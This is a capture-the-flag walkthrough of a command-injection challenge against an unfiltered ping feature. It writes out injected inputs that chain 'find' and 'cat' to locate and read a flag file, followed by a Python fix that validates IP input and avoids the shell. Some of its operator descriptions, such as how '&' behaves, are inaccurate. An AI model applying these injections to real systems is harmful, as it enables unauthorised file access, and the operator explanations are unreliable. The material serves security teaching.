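XCTF: Xiao Ning wrote a ping feature but no WAF, and Teacher X told her this is very dangerous
【Challenge description】
Xiao Ning wrote a ping feature but did not write a WAF. Teacher X told her this is very dangerous. Do you know why?
【Goal】
Learn the basics of command execution.
On Windows or Linux:
command1 && command2: run command1 first; if it is true, then run command2
command1 | command2: only command2 is executed
command1 & command2: run command2 first, then command1
command1 || command2: run command1 first; if it is false, then run command2
Command execution vulnerability (|, ||, & and && are called pipe operators): construct the statement
Output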
ping -c 3 127.0.0.1 && find /home -name flag*
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.068 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.058 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.050 ms
--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1998ms
rtt min/avg/max/mdev = 0.050/0.058/0.068/0.011 ms
/home/flag.txt
This gives the location of the flag; continue constructing the statement.
Result:
ping -c 3 127.0.0.1 && cat /home/flag.txt
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.053 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.044 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.049 ms
--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1998ms
rtt min/avg/max/mdev = 0.044/0.048/0.053/0.008 ms
cyberpeace{8b8e359f89d584845ad41ae2fcc02d1e}
cyberpeace{8b8e359f89d584845ad41ae2fcc02d1e} is the flag.
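
The weakness behind the walkthrough above and its fix, as an added example that is not code from the challenge or the original page: the unfiltered handler is assumed to build the string "ping -c 3 " + input for a shell, while the hardened form accepts only an IP literal and passes an argument list with no shell. The function names are hypothetical and the sample inputs are constructed from the payload shown on this page.

```python
import ipaddress
import shlex
import subprocess

OPERATORS = {"&&", "||", "|", "&", ";"}


def vulnerable_command(target: str) -> str:
    """String an unfiltered handler would pass to the shell (assumed pattern)."""
    return "ping -c 3 " + target


def shell_operators(command: str) -> list:
    """Control operators a POSIX shell finds when it tokenises the string."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    return [tok for tok in lexer if tok in OPERATORS]


def safe_ping_argv(target: str) -> list:
    """Accept only an IP literal; return argv for execution without a shell."""
    addr = ipaddress.ip_address(target.strip())  # ValueError for anything else
    return ["ping", "-c", "3", str(addr)]


def run_ping(target: str) -> str:
    """Hardened handler: argv list, shell=False, so operators are never parsed."""
    argv = safe_ping_argv(target)
    done = subprocess.run(argv, capture_output=True, text=True, timeout=10)
    return done.stdout


if __name__ == "__main__":
    # Constructed inputs: one benign, one taken from the payload shown on this page.
    for target in ("127.0.0.1", "127.0.0.1 && cat /home/flag.txt"):
        print(repr(target), "-> operators seen by a shell:",
              shell_operators(vulnerable_command(target)))
        try:
            print("   argv:", safe_ping_argv(target))
        except ValueError as exc:
            print("   rejected:", exc)
```

Validation happens before any process is started, so a rejected input never reaches ping at all, and an accepted one arrives as a single argv element that no shell interprets.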